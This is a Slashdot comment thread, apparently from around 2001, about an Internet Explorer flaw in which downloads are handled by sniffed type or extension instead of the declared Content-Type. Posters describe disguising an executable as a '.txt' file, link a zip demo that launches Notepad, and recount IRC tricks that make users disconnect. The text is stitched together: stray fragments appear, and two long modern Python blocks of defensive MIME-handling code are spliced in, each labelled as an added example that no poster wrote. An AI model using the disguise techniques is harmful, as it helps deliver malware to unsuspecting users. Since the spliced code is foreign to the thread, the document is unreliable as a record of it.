As a workaround, I've been adding a &whatever=foo.extension to trick IE 5+ into using the extension I need it to use. (Ugly if you need to return a PDF document from a JSP (or god help you) ASP page. I have a pretty good guess how this could be used by the forces of darkness.... never thought about "real" binaries before....
+++ UGUCAUCGUAUUUCU
Then you've probably clicked on some links that took you to sites that are very little known and that could contain rogue code that exploits this IE security hole.
I guess IE users will just have to stop using search engines then. I guess that will only affect about 80% of the Net users, so you're right, this isn't a big deal.
"Oh shit." -- William H. Gates, III
My friends will all be really excited about this now because he bought his copies from a guy on a street corner in Hong Kong for the equivalent of three dollars!
With both IE and Konqueror, you have a good web browser (excluding problems already mentioned with regards to IE...), and that web browser also acts as the file manager, except all that each is doing is mimicking what their predecessors did without providing any extra functionality that is inherent in a web browser.
Sure, IE has some neato wiz-bang "features", but it's ridiculous to claim that it adds anything to local file browsing that wasn't already provided by the previous program. Same goes for Konqueror.
Granted... they are both better file browsers than their predecessors, but that functionality is completely separate from web browsing and could be removed and used to create a totally separate file browser. There is absolutely nothing gained by integrating the two.
You can do it manually like that if you like, or you can just get 98lite and have it do the grunt work for you. Best $15 you'll ever spend if you're forced to use Windows on a semi-regular basis (for gaming, Office, etc.)
ya except rpm based distros suck ass. long live debian! (and os x)
I'm not one generally to defend Microsoft but I distinctly remember this being an issue several months ago that we patched.
Would the following patch not also fix the issue described here?
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/security/bulletin/ms00-082.asp
The technet article describes HTML emails but I wonder if the same patch wouldn't fix the general problem?
-Tseuq
My friend, there is not free lunch, everything costs something.
The price of IE is reflected in the price of Windows and all other Microsoft software.
This is mostly true, however gcc does require certain file extensions (check 'man gcc'), and I would say that gcc is a major UNIX/Linux tool.
Personally, I don't think that Linus would have allowed something like this to get through in the first place.
But that's just me.
I like you, Stuart. You're not like everyone else, here, at Slashdot.
using this.
a wedge of fine aged Swiss or Internet Explorer? Or was Internet Explorer modeled after Swiss cheese in the first place?
Now, what happens when you integrate your web browser and your local browsing, say to render moot an anti-trust suit filed against your company?
How is this any different from Konqueror? I may just not be understanding Konqueror, but from my limited experience it seems like the same thing. That's all I want to know,
11 was a racehorse
12 was 12
1111 Race
12112
I've had serious problems with Opera crashing the operating system when there are too many windows. I've reported this bug several times. No answer.
Bush's education improvements were
Appendix A: MIME Type Detection in Internet Explorer
Now, here's how I came across this little gem of stupidity:
I have designed a few cgi-enabled websites (for myself) that have a rather odd feature- compiled VB cgi. This seems very strange, I'm sure, but VB is actually fairly nice for very simple programs that handle databases.
Unfortunately, I started running into trouble when I assumed that IE played by the rules with the Content-Type headers. I naively assumed that I could generate images as well as html on the fly, and IE would display it the way it was intended, since this would be very good for displaying images that were stored in the blob field of a database.
Wrong! It turns out, certain Content-Types are considered "ambiguous", meaning that IE assumes you don't know what you're talking about and it needs to check to see if the content actually is what you say it is. If it fails the test, then IE overrides the Content-Type and simply displays the page as what it thinks it is.
Ok, that doesn't sound too bad, does it? Well, what if you have a file that you list as Content-Type: text/plain (which is one of the ambiguous types), but the actual data is executable! IE tests the data and decides that the Content-Type is wrong, decides to treat it as executable, and pops you a dialogue box, asking if you want to download this or open it.
Mind you, all this time, the URL sitting in your address bar probably ends in ".html". So you say "yeah, let's open the file."
Now, I haven't tested this scenario, since I don't have malicious intent. The real bug is probably not quite as straight-forward as this (but then again, maybe it is). However, I can't help but be disgusted at the fact that this is not an accidental oversight, but rather an unintended consequence of a boneheaded feature.
I have received a number of emails recently attempting something like this, but I'm not using Windows so I can't say whether or not they would have been harmful.
It is delivered with the same media but you are not offered the option of opening any files it just happens without your knowledge. Thus making the vulnerability worse if it were released to the world as a virus.
Until one of my users got an email with an attachment that would just execute itself from the preview pane, no matter what the security settings were.
I sat there and toyed with it (yanked the LAN cable first) and absolutely could not get it to *NOT* run automatically.
(Her Outlook Express probably had been upgraded a month before, I think, but downloading the latest version *did* take care of the problem.)
The real question is, why does Outlook support *any* of these behaviors? Sure, occasionally it's nice to HTML-ify an email and stick in a picture, but do I really need DHTML, scripting, cookies and all of that other crap?
When was the last time somebody had a legitimate reason for sending an embedded script in an email?
Oh, sure, let me have my personal emails set a cookie when they get read. Sure, I'm really going to do that.
Why not just have a really scaled-back HTML renderer that ignores tags that you choose to ignore?
Cheers,
Jim in Tokyo
-- My Weblog.
Those of you who read the articles will consider this redundant, but I've seen so many different interpretations of how the exploit works (and many wrong ones modded up), so I thought I'd clear it up:
You make a trojan or other malicious executable, and name it 'something.txt'. Then you make your HTTP server tell browsers that this file has content type 'application/octet-stream'. IE will read the content type header and realize that it's an executable, and ask you if you want to open it or download it. But since the file name indicates a text file, there's absolutely no indication that a program will be executed if you choose "open".
DISCLAIMER: I haven't tried this. This is just my interpretation of what I've read in the various articles. Also note that some versions of IE will use the word "execute" instead of "open" in the pop-up dialog, which might help tip some users off.
-- If no truths are spoken then no lies can hide --
someone write a little web-page exploit that, say, when the webpage is opened would reboot the windows machine and display a popup message box upon the reboot, maybe with some personal information, like ip address, windows user name, something like that. This would be a very simple way to show the countless hoards of win users that their system is vulnerable. Oh, and include a comment about this is a windows only problem.
Just my thoughts to this so-called-exploit that "people" say is a major problem. If a web page can cause my computer to reboot and pop-up a window, then this will show me that there is a definite problem.
What percentage of 85 is 'other' browsers set to say they're IE?
Whatever happened to journalistic integrity? Now I agree with the need for posting this vulnerability, but the article is horrid. It provides little information and at the same time is extremely incisive. This has to be written in the most inflammatory way possible. This is literally an embarrassment. What is the point of this insanely sensationalist news? This type of treatment is not necessary, and is especially unequal. No Linux/BSD/Unix vulnerability has ever been ended with "Happy (browsing|mailreading|telnetting|etc)". Sure, it needed to be posted, but this is written in the same horrid, trigger-happy, publish-now-correct-never, let's-bash-Microsoft, let's-bash-integration (kernel httpd, anyone?), insulting and riot-inciting way possible. This would never be permitted in a print journal, and is why that official recognition of internet publications that was posted today was so long in coming. If this was a television anchor saying this they would have been the butt of a massive libel lawsuit (Oprah beef suit, anyone?). But it's slashdot, so it's ok.
This is bullshit.
This hurts the people that don't know enough to not open the file. These are the same people that Microsoft is trying to make their operating system easy enough to use. Therefore, it is simple enough for beginners to use but its security is made in such a way that a beginner can have their computer taken over by a virus.
Volunteer Mozilla developer, RPI Student.
Besides, it's not like Microsoft are the only folks who take forever to release patches.
There's an excellent article by Bruce Schneier in his latest Crypto-Gram newsletter discussing the issue of Full Disclosure. I recommend taking a look at it.
Do you know that opera's printing suffers from 'tiny' font. Print a web page and it is *very* small.
I found that out when I was trying to make a "view source" link to a .jsp file that was a soft-link to the jsp with the suffix of html. Apache sent "text/plain", as appropriate. Netscape and Mozilla viewed it just fine, just as I wanted them to.
I.E. noticed that it looked awfully like HTML and rendered it as HTML, effectively hiding all the embedded java and jsp tags that I wanted to show.
bastards...
"But remember, most lynch mobs aren't this nice." (H.Simpson)
-- Joe
Did you miss the ethics lecture on day one?
You do want to get a law license right?
Someone stated that IE is free. But it's not, you see. We all do. IE comes conveniently with the following MS products:
Windows (in all 31 flavors)
Office
Works
Etc.
Of course, by the fact that you need Windows to run all of the above products and need Windows to run IE itself, you have paid for IE. Of course, once you are hooked onto it you can get all the free refills you want from microsoft.com
"A diplomat is a man who always remembers a woman's birthday but never remembers her age." -Robert Frost
Ok, slap me if I'm wrong, but I've had IE pop up a dialog box that says "do you want to do X, click yes or no" and it does something based on yes or no. What happened to me was, I was browsing around for emulators and roms, and I got kicked to a porn site and a million pop-ups. One of them had a grey IE yes/no dialog pop-up, which said, "do you want to download our nifty porn browser?" I said no. It apparently downloaded something...because when I rebooted (just to kill all 35 pop-ups) I had a new virus, and I never once hit Open File. It was a neat little bugger, every time you hit a key it would send backspace and a letter of a character string to the output. so...
I type: "www.slashdot.com"
and it types: "I am F%^king GAY!!!"
I thought it was interesting that it had gotten on my computer without my knowledge...I don't open files I don't trust and maybe it was another exploit of IE, I don't know. But it got on there somehow...of course, this type of thing makes the current bug pointless, right?
Who is this Anonymous Coward character, how does he post so much, and why is he always such a whore?
Although I never liked Opera's interface, Mozilla has recently become my go-to browser. The first few versions (especially the Netscape branded ones) weren't so stable or capable. But the last 3-4 milestones have been topnotch, especially .95 with the tabbed interface. Best of all I can use it in Linux.
It does have its shortcomings. Opera is much less of a resource pig, and Konqueror is better thought out. But I rarely encounter any problems rendering pages (I did in past releases). The bonus of being open source, skinnable and multi-platform clinches it.
In a final note. I think it is obvious that Microsoft's complete disrespect for their customers' security and privacy needs necessitates an emigration from their products. I currently run Windows boxen for Macromedia and Adobe apps. For servers I run BSD or Linux, however I was at my local CompUSA playing on a dual-G4 OS-X box. Incredible interface, even ran Windows 2000 via Virtual PC. I was impressed enough with OS-X that I almost bought it, $2500 worth. The lesson, Apple is close, Microsoft has slipped. It wouldn't take very much for Apple to gain those of us constantly jumping between Windows and Unix. Maybe a G5 that achieves a better Price/Performance ratio. How about a bare bones Mac, for those who like to build a custom box.
Just a few thoughts. I am not a Mac Zealot, but to be able to dump Windows and Explorer would make me feel safer.
Another favorite is to invite people to #2,000 or another similar channel. This causes ircii-based clients to leave all open channels.
Also telling people to "sign the guestbook, just type /sign yournamehere" ... where /sign is short for /SIGNOFF which is an alias for /QUIT... ;)
Justin
"Why would God give us a waist if we wasn't supposed to rest our pants on it?" - Rev. Roy McDaniels
If the volunteers for OpenBSD can go through the software and eliminate security problems in advance, Microsoft, with 30 billion dollars in the bank, could also. Since Microsoft doesn't do this, maybe there is some reason. Maybe the U.S. government has dictated that they leave bugs in.
Software is only an operating system if it can be trusted. If it can't be trusted, there should be some other name, like fnord. Microsoft Fnord XP.
--
U.S. planned to attack Afghanistan before the second WTC bombing.
post a link to the picture of 'another gaping security hole'.
--
The Cap is nigh. Time to get a fresh new account.
From the article:
Oy Online Solutions offered to demonstrate the flaw at a private Web site only if recipients of the demo signed an agreement not to disclose information about the exploit.
Perhaps those same people can explain exactly how often people who might exploit such an IE deficiency also follow such laws as: DMCA, anti-piracy, anti-theft, anti-terrorism, etc.
That's completely ridiculous. That's like asking the wolf to sign an NDA before letting them loose (unmonitored, of course) in the hen house.
On a side note, I'm still waiting for a 'leet hack that will damage my install of Windows 2000. I don't run virus scan, so I'm not "protected" in that sense. But the first HUGE stumbling block is that my user has peon rights to my own system. I fail to see how this exploit could damage my system. Sure, I might lose some files, but now I'm more attuned with the (better) Unix model of users and their rights.
Ah, you need to read the part in the EULA where you hold Microsoft harmless for any damage to your computer, even if Microsoft knew there was a problem and didn't do anything about it. And with UCITA, this would be codified in law. Doesn't that make you feel all warm and fuzzy all over?
In the USA, we like stuff watered down, like beer, television, and freedom.
You would hold your AV vendor responsible if a non-viral file like format.com is used through an IE vulnerability to destroy your data, but not Microsoft, because IE is free?
The kids in your neighborhood may like to leave paper bags on your doorstep that are full of something just as free and about as pleasant.
You actually pay for IE a little with every purchase of MS' products. The money to subsidize its development has to come from somewhere.
They also force you to install it with windows whether you like it or not, and provide no means with which to uninstall it. That's downright obnoxious, IMHO. 98lite can take care of it, but such measures really shouldn't be necessary in the first place.
"Where shall the word be found, where will the word resound? Not here, there is not enough silence." -T.S. Eliot
I'd really like to know. Currently my choices are:
1. Stop thinking about this question entirely. No, really, stop thinking about it. Try really hard... whoops, I thought about it again.
2. Believe what the law student says, unless he's contradicted by an equally plausible source.
3. Believe the "It's legal to download ROMs if you delete them within 24 hours" type rumors that get spread around the internet by the legally ignorant.
4. Hire a real lawyer to talk to for hundreds of dollars.
I'm sure law school grads (including your ethics lecturer) would love option 2 to be unavailable, but I'm just not seeing a superior alternative here.
You, sire, are a moron.
Would be to release a "Deactivation" virus, that spreads like wildfire...
Moderators, mod this up -- just because you don't agree with the post, that doesn't mean it isn't moderation-up-worthy.
+1 Interesting
Actually, Linux has had security problems in the past.. and Linus needs to take some classes on Quality Assurance; I'd sooner trust Microsoft to come out with a secure opensource kernel than I would Linus.
:)
But then again, I'd expect Linus to come out with a more secure closed source kernel than it would be likely for Microsoft to come out with a secure closed source kernel
"No wonder I don't come here anymore."
This statement is clearly false.
If software is known to be faulty, either the company licensing fixes it or they do not.. they are not required per their license to fix bugs; unless explicitly stated in their license.
If their product is not secure; that is your fault and negligence for running it, not the developer's
This is like saying that it is microsoft's fault that someone gets infected by a virus; when it is the user's fault for being stupid enough to trust any product made by microsoft..
Most end up knowing that they will clean up the mess, because "The top guys like Microsoft so much - it has so many features."
Show the "top guys" the article about Microsoft finally getting around to patching their browser. Make sure you highlight this text from the article:
Until the patch is available from Microsoft, Pynnonen said concerned users can temporarily disable IE's ability to download files.
Explain to them that if they want to 4) Clean up the mess, while the mess is being cleaned up, they need to stop their downloading of mysterious files off the internet.
Try to mix in some economic terms: "Boss, in order that we may obtain greater reliability through Microsoft's web browser, Microsoft says that we need to disable part of the function of the web browser itself, aka sacrificing our productivity in order to maintain stability."
That should get their attention.
Is that no one is talking about the actual exploit in detail. Historically, BUGTRAQ has *always* had a policy of full disclosure, when did this change? According to the article:
"A subsequent message sent to Microsoft and Bugtraq Nov. 28 described the more serious issues but was not published on Bugtraq by joint agreement between Pynnonen and the list's moderator, the security researcher said."
Correct me if I'm wrong, but doesn't this sound like BUGTRAQ is removing messages that describe security vulnerabilities in detail? I have a hard time understanding why that's necessary and, again, it is so contrary to BUGTRAQ's usual policy as to leave me gaping in disbelief.
Full disclosure vs. non-disclosure issues aside, it seems to me that just announcing there's a security flaw and not revealing the specifics seems worse than the security flaw itself. I mean, think about it, how does it help if I know there's a problem but I don't know exactly what it is? How does this help me? Yeah, it's great if you want to write web articles about Yet Another Microsoft Security Flaw or you love Netscape/AOL or whatnot but saying "There's a problem but we can't tell you anything about it" isn't going to do anything for the average user.
It is such BS to see that people are afraid or told not to download files from the web. The web was designed to make downloading easy! It's really sad that these MS security problems are scaring people away from using the web for what it was freaking designed for! I'm so sick of hearing people say "well you should know not to download a file"! The whole idea was to make it easy to exchange info and files. Argh.
The issue is not that there's a bug as such, because as a software developer I know that bugs just happen as in "That's life folks", *but* that it's a dangerous bug and Microsoft have not fixed it despite continuing to sell it.
Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
I know from my web development experiences that this has long been a problem. In fact, recently me and a friend were contracted to make some modifications to a site built in perl. The client was an all-MS shop and did not notice that sometimes the contents of the CGI's got dumped out the screen raw. It turned out that since they all used IE, it automatically assumed the output to be HTML and rendered it, but when we used Mozilla, since no proper MIME header was sent, the browser just rendered it as text. Kind of scary that this can go on without anyone doing something about it.
--Jon
Actually, Slashdot has way more Windows apologizers than it used to. And this is a bad thing.
It used to be that the heavy Linux focus kept away a lot of idiots. Now everyone feels like it's supposed to be some grand open forum. It used to be a much larger percentage of users just accepted the Linux perspective (I won't call it bias) and moved on.
As to this article, I think it may seem a little on the angry side. But I'm sort of angry here too. MS needs to get its act together (although I'm sure they're scrambling for patches now).
The problem is not some crazy design decision (integrating IE isn't necessarily that bad of an idea), the problem is that MS has too many programmers pointed too many different directions.
It can be a hard job to keep things secure when you're working with a lot of disparate technology (and your boss is mostly concerned with how it looks). I have a fair amount of respect for MS programmers - perhaps they need some better management.
Let's not stir that bag of worms...
Ironically, I ran into this one just the other day, but didn't recognize it for what it was.
I develop software for a living, and one of my tools is a web-based thingy with a CGI interface. A typical URL might look like this:
http://foo/bar.cgi?blah=blah&filename=quux.jpg
This CGI script returns a web page with info about the file "quux.jpg," which exists on the server.
When I serve this URL up to IE 6 under Windows 2000 (maybe other versions; that was the only Windows IE I tried) the browser thinks it's downloading a JPEG image, and asks me where I want to save it.
My script sends a nicely formatted Content-type header of text/html, but the browser is stubborn and won't listen.
So in my case, this wasn't really indicative of a security hole, but rather a pretty dumb design flaw in the browser that should have been caught in testing.
(Oh, and FYI, my "fix" was to reorder the CGI parameters as the URL gets constructed, so the filename never comes last. I'm not happy with this, and I may implement URL-encoding the filename's "." character instead, then decoding it on the server side. But the spec says I shouldn't have to do that, so the whole situation has left me kind of pissy.)
Here's an easy fix for Microsoft to implement: have IE append the "expected extension" to the name of a file if the extension given is wrong. For instance, if foo.txt has a content-type of application/octet-stream, have it tell the user that they are downloading foo.txt.exe, and reflect this in the open/save dialog and the name of the saved file. This has a pleasant non-security side-effect - I often write CGIs which return a content-type of, say, application/pdf. If the user downloads the resulting data, it will be saved as myapp.cgi. This will cause problems when the user tries to open the file.
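As an added example (my own code, not from this thread or from Microsoft), here is the rule proposed above written out in Python: derive the extension the content type implies, check the first bytes for a Windows executable header, append the expected extension when the URL's name disagrees, and label the dialog button "Execute" rather than "Open" for executable types, as another poster notes some IE versions do. The URL names, the extension lists and the byte prefixes are constructed for illustration.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Extensions the Windows shell runs directly (constructed, illustrative list).
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".pif", ".scr"}

# Declared Content-Type -> extension a download of that type should carry.
# application/octet-stream is deliberately absent: it is resolved by sniffing below.
TYPE_TO_EXT = {
    "application/x-msdownload": ".exe",
    "application/pdf": ".pdf",
    "text/plain": ".txt",
    "text/html": ".html",
    "image/jpeg": ".jpg",
    "image/gif": ".gif",
}


def looks_like_pe(prefix: bytes) -> bool:
    """True if the body starts with the DOS 'MZ' stub every Windows .exe carries."""
    return prefix[:2] == b"MZ"


def filename_from_url(url: str) -> str:
    """Take the name from the URL *path* only; a query string such as
    ...&filename=quux.jpg must never influence the proposed file name."""
    name = unquote(posixpath.basename(urlsplit(url).path))
    return name or "download"


def expected_extension(content_type: str, body_prefix: bytes):
    """Extension implied by the server's type, corrected by a look at the bytes."""
    declared = content_type.split(";", 1)[0].strip().lower()
    if looks_like_pe(body_prefix):
        return ".exe"  # whatever the header says, this is a program
    if declared == "application/octet-stream":
        return ".bin"  # opaque binary: never let it pass as .txt (my choice, not IE's)
    return TYPE_TO_EXT.get(declared)


def download_name(url: str, content_type: str, body_prefix: bytes):
    """Return (name, verb): the name the open/save dialog and the saved file
    should carry, and the dialog button label, 'Execute' or 'Open'."""
    name = filename_from_url(url)
    current_ext = posixpath.splitext(name)[1].lower()
    wanted = expected_extension(content_type, body_prefix)
    if wanted and current_ext != wanted:
        name += wanted  # foo.txt served as a PE image becomes foo.txt.exe
    verb = "Execute" if posixpath.splitext(name)[1].lower() in EXECUTABLE_EXTS else "Open"
    return name, verb


if __name__ == "__main__":
    # Constructed cases: the trojan-as-text-file case and the CGI-returning-PDF case.
    print(download_name("http://example.invalid/something.txt",
                        "application/octet-stream", b"MZ\x90\x00\x03"))
    print(download_name("http://example.invalid/myapp.cgi",
                        "application/pdf", b"%PDF-1.4"))
```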
But, gee, since it's Linux, I don't think those things are real concerns, do you?
Sure it's a concern.
My brother in law installed Red Hat 5.1 last week.
I told him I would make him copies of the Slackware 8.0 CDs that I just bought on CheapBytes. Hell, I told him I have two or three generations newer Red Hat CDs he could use.
He's stubborn. He has that nice book that came with Red Hat 5.1. He installed Red Hat 5.1.
I am sure there are hundreds and thousands of other people running outdated Linux distros as well. They're using the CD that came in the cover of that book.
It happens. A lot.
Get a clue, dude.
IE/W98/W2000 is the only Browser/OS combo I use. Why? Because IE starts quickly, renders pages correctly and without waiting for the entire page to load, has support for all kinds of bloated web page stuff that Netscape doesn't support, doesn't show me a bunch of garbage when I click on a link to a binary file (like Netscape), and its graphics and UI get modified more than once every 6 years. Anyways, where is this awful hole? I've been looking at web pages made by script kiddies for years and no one has tried this on me. And why didn't Nimda and Melissa and AnnaK get my Outlook client? I read all this hype 10 times a day on Slashdot and I want to know where my share of security problems are! I was promised to get screwed over for using IE/Outlook/Windows and I think I should sue Slashdot!
There's a fairly easy exploit (for IE since 4 I think) that allows a malicious web page to read arbitrary files off a users hard disk.
No patch available as far as I know. It's also a lot easier to exploit than this one (heck, I even was able to do it).
I'll put details up if anyone's interested...
Let's not stir that bag of worms...
Limited Liability.
Just read the EULA, you have dick of a right to sue them FOR ANYTHING (but that doesn't really mean you can't, for all practical purposes.).
Finally a sensible post.
The webserver usually has mappings to the content types that it is serving up.
So it tells the browser what the content type is when a file is requested with http.
It's really easy with any type of server side scripting to change the content type header.
For example, I've written java servlets that change the content type to image/gif to do some dynamically generated charts.
If the URL was to a file that ended in .gif the webserver would see it in its mapping config file to set the content automatically.
However my servlet might be something like www.myserver.com/servlet/Chart and I have to manually set the content type per request.
Also a story about it here, http://www.theregister.co.uk/content/4/23223.html
I've had it installed at work for a week now and do just fine without all the images and special formatting of spam.
"I have a cunning plan..."
Microsoft will patch a flaw in its Web browser that could allow an attacker to silently download and execute malicious programs on the computers of users who view a specially constructed Web page or e-mail message.
The /. article leads one to believe that they are brushing it off, when in fact they were just trying to wait until they actually had a worthwhile patch before they said anything.
The patch for Internet Explorer (IE) is currently in testing and could be released soon...
So, am I missing something? There is a patch in the works, it is just not released.
Sure, it should have been released a long time ago. Or, should never have had to become an issue.
Shame on MS for bad practices.
But the
Now the real question is.... will the patch just open 7 more holes?
-xtype
Honestly? I seriously would recommend browsing the web only with Mozilla. I had been using IE, but I switched to mozilla full time after 0.9.1 (except for work related browsing on my company's web pages, which are written exclusively for IE browsing.) It's been buggy, it's still a little buggy, but I haven't had many real showstoppers because of it. And no one's published any attacks yet, but because it's NOT integrated into the OS, I'm somewhat less concerned about the damage it's capable of causing.
If you're stuck with IE, then might I recommend a proxy filter such as The Proxomitron? You can modify the incoming http headers to do anything you want, including altering file extensions!
John
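The filename normalization proposed in the "easy fix" post above (append the content type's expected extension whenever the URL's extension disagrees with the declared type) and the header-based filtering a proxy like The Proxomitron is suggested for, written out as an added example. This is not code from any poster, from Microsoft, or from The Proxomitron: it keys every decision on the Content-Type header, as the HTTP spec expects, and consults the URL or Content-Disposition name only to choose a file name. The sample URLs and headers are constructed.

```python
"""
Decide how a fetched resource is handled and what it is saved as, keyed on the
Content-Type header rather than on the URL's extension.
Added example; not code from any post in this thread.
"""
import mimetypes
import posixpath
from urllib.parse import unquote, urlsplit

# Extension this example pins for each media type it cares about
# (mimetypes.guess_extension() can vary between platforms).
CANONICAL_EXT = {
    "text/html": ".html",
    "text/plain": ".txt",
    "image/jpeg": ".jpg",
    "image/gif": ".gif",
    "application/pdf": ".pdf",
    "application/zip": ".zip",
    "application/octet-stream": ".bin",
    "audio/x-wav": ".wav",
}

# Types the client renders inline itself; everything else is saved to disk,
# never handed to whatever application the extension happens to map to.
RENDERABLE = {"text/html", "text/plain", "image/jpeg", "image/gif", "image/png"}


def parse_header(value):
    """'text/html; charset=utf-8' -> ('text/html', {'charset': 'utf-8'})."""
    parts = [p.strip() for p in value.split(";")]
    params = {}
    for p in parts[1:]:
        if "=" in p:
            k, v = p.split("=", 1)
            params[k.strip().lower()] = v.strip().strip('"')
    return parts[0].lower(), params


def last_component(name):
    """Keep only the final path segment, whichever separator the sender used."""
    return posixpath.basename(unquote(name).replace("\\", "/"))


def extension_matches(ext, media_type):
    """True when ext is an extension the local type map assigns to media_type."""
    if not ext:
        return False
    expected = CANONICAL_EXT.get(media_type)
    return ext == expected or mimetypes.guess_type("x" + ext)[0] == media_type


def classify(url, headers):
    """Return how the body should be treated and the name to save it under."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    media_type, _ = parse_header(hdrs.get("content-type", "application/octet-stream"))
    disposition, dparams = parse_header(hdrs.get("content-disposition", "inline"))

    # A server-supplied filename is preferred, then the last URL path segment.
    name = last_component(dparams.get("filename") or urlsplit(url).path) or "download"
    ext = posixpath.splitext(name)[1].lower()
    expected = CANONICAL_EXT.get(media_type) or mimetypes.guess_extension(media_type) or ".bin"
    mismatch = not extension_matches(ext, media_type)
    action = "render" if media_type in RENDERABLE and disposition != "attachment" else "save"
    return {
        "media_type": media_type,
        "action": action,
        "mismatch": mismatch,
        # On a mismatch the declared type's extension is appended, never substituted,
        # so the user still sees the name the server sent.
        "save_as": name if not mismatch else name + expected,
    }


if __name__ == "__main__":
    # Constructed cases: a CGI page, a mislabelled text file, a clean archive.
    for url, hdrs in [
        ("http://foo/bar.cgi?blah=blah&filename=quux.jpg", {"Content-Type": "text/html"}),
        ("http://example.test/foo.txt", {"Content-Type": "application/octet-stream"}),
        ("http://example.test/clip.scr", {"Content-Type": "audio/x-wav"}),
        ("http://example.test/report.zip", {"Content-Type": "application/zip",
                                            "Content-Disposition": 'attachment; filename="report.zip"'}),
    ]:
        print(url, "->", classify(url, hdrs))
```

The CGI URL with a trailing filename parameter is rendered as HTML because that is what the header says; a ".txt" served as application/octet-stream is saved as foo.txt.bin; and a name smuggled in through Content-Disposition is reduced to its last path component before it is used, so a directory traversal in the suggested name cannot reach outside the download directory.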
who exactly does he have to assure of quality? He never made any promises that linux is more secure, unlike certain companies.
You want to see it for yourself? The problem is that IE gets a file that ends in say, .ZIP, asks the user to download or open from current location, and if it's "open from current location" it actually executes the code as an executable, even if it _IS_ a .ZIP. There's nothing special here, and it doesn't need you to have web administrator access, I did it here: http://www.cs.nmsu.edu/~dfoesch/funny.zip If you want to see the exploit first hand, select "open file from current location" and then if it asks you what application to use, just click "ok" (ok, you might have to select the first entry) and PRESTO! Notepad.EXE! Running remotely on your computer! This could easily be any arbitrary program, I just chose Notepad.
I am unamerican, and proud of it!
I just don't understand it. Why do people use IE still? For a long time I understood them, it used a whole lot less memory than netscape, and rendered webpages a whole lot better than other browsers. But then I found Opera which completely blew me away. Not only does it only use 14 megs of memory, which is a lot, but not nearly as much as IE (25 Megs) or Netscape (35 Megs), and it renders webpages just fine. I will probably get modded down for being a troll, but could someone tell me why they still use Internet Explorer?
--------------------------------------
58.0% slashdot corrupt
The fact that IE sometimes ignores content-types and uses the file extension is not news.
This is something that I thought was general knowledge. I first ran across it trying to provide VMS DCL command files (.COM) via a web server (configured to pass .COM as text/plain). I guess no one had worked out the details of how to exploit it before.
Milalwi
Links. It supports frames, renders tables better, etc.
Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).
I have to plug something here.
:-)
Check out the procmail-based scanner at impsec.org
If you can set it up, do so - it's saved my ass quite a few times, by mangling active html content and renaming file extensions etc. It can also scan M$ docs for sus looking macros.
The following is something I received today that would slip through otherwise (notice the original content-type)
> SECURITY WARNING!
>
> The mail system has detected that the following
> attachment may contain hazardous program code, is
> a suspicious file type, or has a suspicious file name.
> Do not trust it. Contact your system administrator immediately.
>
> X-Content-Security: [www.ccimackay.com] original Content-Type was audio/x-wav;
> Content-Type: application/octet-stream; name="HUMOR.MP3.27525DEFANGED-scr"
> Content-Transfer-Encoding: base64
> Content-ID:
>
End of blatant plug
You are in a twisty maze of processor lines, all alike.
There is a lot of hype here.
works on mirc too.
We law students are not lawyers. We law students are incompetent to give legal advice. When I say something about the law, it is only one man's opinion, and it cannot be anything more. Law students do not give legal advice.
Just remember, if you have a real legal problem, you need a real lawyer.
I am not a lawyer. Do not take my words as legal advice. If you need legal advice, consult an attorney.
Let's say that this hits the news. CNN tells people to be careful when they use IE/Outlook. John Doe says "Oh my, that's terrible!" and stays away from the computer for a few days because it could blow up on him. Later on though, the pr0n is too tempting and he starts using IE again. Darnit, this is some good stuff here.. Anna Nicole Smith and all this type of stuff. Two months later he doesn't remember a thing about the horrible bug in IE. Because his computer works fine.
I am 99.999% certain that this will not be a turning point in the browser war. John Doe doesn't care unless his pr0n disappears. And he is certainly not going to download Netscape because that's too hard, let alone PAY for Opera?! He can view his pr0n quite well on IE, barring of course the fact that he gets 400 popup windows on his screen by clicking some link.
Microsoft will walk away from this one too. Until Microsoft blows up John Doe's computer, or takes away his pr0n, this will probably go fairly unnoticed by the public.
Wealth is the product of man's capacity to think. -Ayn Rand
Not all Microsoft customers are end users. Some of them are businesses, and those businesses want to send you spam. And they can't track their spam unless they can use 'DHTML, scripting, cookies and all of that other crap'.
So just get over it. You can't tell Microsoft what to do, so use another browser/email client. There are plenty of them out there. Vote with your feet, not your Slashdot Soapbox.
-Mike
Time to put on your asbestos underwear kiddies! ;)
Real men pre-compile the JSP's into servlets so the users don't have to...
Innovate? Bah, I did not say that. What I did say was moving binaries is painful with server side Java, and even worse using JavaScript or VBScript. Try it some time, I had to last week....
I've spent way too much time coding C++ ISAPI filters and extensions, COM components, and ASP to say this sux d00d! Right tool, right job. Most of my personal time these days is spent building ATL COM components for the ARM...
I'll assume you are fresh to this web stuff - M$ or $un whore? Stuff evolves. My first CGI work was in C, followed by ISAPI and NSAPI, ASP, Servlets, and lately custom tags, XML, and yes -- JSP. The trick is to know when and why one is a better choice than another for a job. That, and making your resume fully buzzword compliant....
(PS - get an account Steve)
+++ UGUCAUCGUAUUUCU
The lie:
..."the malicious content is automatically executed."
The truth, from the article that the clown who posted this didn't even bother to read:
"Any way to skip all dialogs, ie. to run an application without ANY dialog with this vulnerability has NOT been found."
C'mon, you morons. At least pretend to read this stuff before you start masturbating at how evil and stupid Microsoft is. Again.
Uhh... I don't know of any sites that fit into this category, do you?
Amazing magic tricks
It cost you a competitive market.
For that matter, when you pay for a copy of windows, you are paying for IE as well. Or wait, I got it, ask Microsoft for a copy of windows *without* IE. Now, if you download it and install it, I'll be willing to consider it free.
Here is a site with some more info on the SliMP3: http://www.mp3newswire.net/stories/2001/slimp3.html
It has a bit more detail on the unit and a picture of it working. Quite an impressive piece of hardware.
If you develop a legal problem, you should talk to a lawyer. Never take legal advice from a law student.
I am not a lawyer. Do not take my words as legal advice. If you need legal advice, consult an attorney.
cause if you did you would have noticed the nice BIG, (pseudo quote) We will not be held responsible for any damages this software causes you or your business (end pseudo quote) section. If I am not mistaken, you signed a CONTRACT that removed all responsibility for any problems you have with MS's software.
Read my journal entry about how I got this data, or just look at the table (that cannot be formatted properly because the lameness filter is the most useless piece of crap that Slashdot has ever forced upon its readers - I'm glad you guys are all about free speech online!! - so use the linked journal where the formatting was accepted and don't forget to continuously annoy CmdrTaco about this annoying "feature" to protect us from the oh-so-evil trolls):
